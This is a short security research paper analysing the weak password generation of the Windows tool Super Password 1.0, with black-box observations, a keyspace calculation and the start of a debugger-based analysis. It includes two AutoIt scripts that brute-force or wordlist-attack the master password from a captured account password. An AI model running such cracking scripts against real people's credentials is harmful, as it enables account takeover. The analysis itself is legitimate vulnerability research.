Analysis of Super Password 1.0
Bart Leppens, Anthony Piron
February 2013
1 What is Super Password
Super Password is an MS Windows application, written in 2000 by Yan QiQi and last updated September 2nd, 2010. The application lives as an icon in the system tray. It tries to fix the problem that we need to remember a different password for every account we create. It takes an account name and a master password as input and then, when the "generate" button is pushed, some magic happens. A unique password of 12 characters is generated. Every time you provide this master password in combination with an account name, the application regenerates the same password again and again.
The help file of the application states: "You needn't worry about the security. The COA algorithm Super Password uses to generate account passwords is very very complex and strong. No one can break it." Let's see if that's true.
2 Blackbox Analysis
2.1 Blackbox characteristics
Super Password has some weird behavior and some strange characteristics. The resulting password is not affected by:
providing the master password in uppercase or in lowercase.
providing the account name in uppercase or in lowercase.
adding special characters (like é, @, ç, ...) to the master password.
adding special characters to the provided account.
...
The range of allowed characters is thus limited to a-z0-9. The resulting password always consists of 12 characters, which are limited to this same range: a-z0-9. Theoretically, the super password must consist of at least 4 characters and the account name must consist of at least 3 characters. This limitation only counts for the GUI: if the input consists entirely of special characters, the statement no longer holds and there can even be no master password at all (e.g. @&|$). There doesn't seem to be a limit to the maximum length, but the more characters provided, the longer it seems to take to calculate the password.
2.2 Blackbox attacking
Suppose we have the credentials of one of the accounts (account name and corresponding password). Then we can try to brute-force the master password, or we can use a wordlist and test whether the master password is on the list. One way of doing this is with a scripting language called AutoIt. The following scripts are written for AutoIt v3.

    WinWaitActive("Super Password 1.0")
    ; We search the master password which gives "b3daeu6zlcl4"
    ; for account name "myaccount"
    $capturedpassword = "b3daeu6zlcl4"
    $accountname = "myaccount"
    ; Fill in the account name field
    ControlSetText("Super Password 1.0", "", "[CLASS:TEdit; INSTANCE:3]", "myaccount")
    Local $file = FileOpen("wordlist.lst", 0)
    If $file = -1 Then
        MsgBox(0, "Error", "Unable to open file")
        Exit
    EndIf
    While 1
        Local $line = FileReadLine($file)
        If @error = -1 Then ExitLoop ; end of wordlist
        ; Enter the candidate, press "generate" and read back the result
        ControlSetText("Super Password 1.0", "", "[CLASS:TEdit; INSTANCE:4]", $line)
        ControlClick("Super Password 1.0", "", "[CLASS:TButton; INSTANCE:1]")
        $a = ControlGetText("Super Password 1.0", "", "[CLASS:TEdit; INSTANCE:2]")
        If $a == $capturedpassword Then
            While (True)
                MsgBox(0, "", $line, 1)
                Sleep(1000)
            WEnd
            Exit
        EndIf
    WEnd

This way we were able to test about 4000 passwords per minute on an AMD Turion 64 X2 Mobile 1.8GHz system. When performing a brute-force attack on the master password we can use the following algorithm:

    WinWaitActive("Super Password 1.0")
    ; We search the master password which gives "5xl2sdc0idf9"
    ; for account name "myaccount"
    $capturedpassword = "5xl2sdc0idf9"
    $accountname = "myaccount"
    ControlSetText("Super Password 1.0", "", "[CLASS:TEdit; INSTANCE:3]", $accountname)
    ; Candidate alphabet a-z0-9; after StringSplit, $String[0] holds the element count
    $String = "a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z" & ",0,1,2,3,4,5,6,7,8,9"
    $String = StringSplit($String, ",")
    For $i = 1 To $String[0] Step +1
        For $i1 = 1 To $String[0] Step +1
            For $i2 = 1 To $String[0] Step +1
                For $i3 = 1 To $String[0] Step +1
                    $1 = $String[$i] & $String[$i1] & $String[$i2] & $String[$i3]
                    ControlSetText("Super Password 1.0", "", "[CLASS:TEdit; INSTANCE:4]", $1)
                    ControlClick("Super Password 1.0", "", "[CLASS:TButton; INSTANCE:1]")
                    $a = ControlGetText("Super Password 1.0", "", "[CLASS:TEdit; INSTANCE:2]")
                    If $a == $capturedpassword Then
                        While (True)
                            MsgBox(0, "", $1, 1)
                            Sleep(1000)
                        WEnd
                        Exit
                    EndIf
                Next
            Next
        Next
    Next

With only 4000 keys a minute, breaking even a 4-character password would take us almost 7 hours: ($\frac{36^4}{4000 \cdot 60}$).
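The observations in 2.1 and the rate measured in 2.2 can be combined to show how much of a typed master password actually counts. The following Python is an added example, not code from the paper: `effective_input` is an assumed model of the observed behaviour (case ignored, everything outside a-z0-9 dropped), not the application's algorithm, and the sample passwords are constructed.

```python
import math
import string

ALPHABET = string.ascii_lowercase + string.digits  # a-z0-9, as observed in 2.1
RATE_PER_MIN = 4000                                 # GUI-driven rate measured in 2.2

def effective_input(typed: str) -> str:
    """Assumed model of the black-box behaviour (not the real COA code):
    case is ignored and every character outside a-z0-9 is dropped."""
    return "".join(c for c in typed.lower() if c in ALPHABET)

def keyspace(length: int) -> int:
    """Number of distinct effective master passwords of exactly `length`."""
    return len(ALPHABET) ** length

def hours_to_exhaust(length: int, rate_per_min: int = RATE_PER_MIN) -> float:
    """Worst-case time to try every effective password of this length."""
    return keyspace(length) / (rate_per_min * 60)

def strength_report(typed: str) -> dict:
    """Compare what the user believes they typed with what actually counts."""
    eff = effective_input(typed)
    return {
        "typed": typed,
        "effective": eff,
        # naive estimate: 95 printable ASCII characters per typed position
        "naive_bits": round(len(typed) * math.log2(95), 1),
        "effective_bits": round(len(eff) * math.log2(len(ALPHABET)), 1),
        "hours_at_measured_rate": round(hours_to_exhaust(len(eff)), 1),
    }

if __name__ == "__main__":
    # Constructed sample master passwords, not taken from the paper.
    for sample in ["Tr0ub4dor&3", "P@ss!", "@&|$", "abcd"]:
        print(strength_report(sample))
    # Generalises the 4-character estimate above to longer master passwords.
    for n in range(4, 9):
        print(f"length {n}: {keyspace(n):>17,} candidates, "
              f"{hours_to_exhaust(n):>14,.1f} h at {RATE_PER_MIN}/min")
```

A master password that passes the GUI's 4-character check can still reduce to fewer effective characters, or to none, under this model.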
3 Whitebox Analysis
3.1 Modifying the original binary
When looking at the application with a debugger, we can see that there are some interesting addresses:
0x004022AA: calls the start of password generation which is located at 0x0040179C
0x00402474
0x0040264B: the application's help function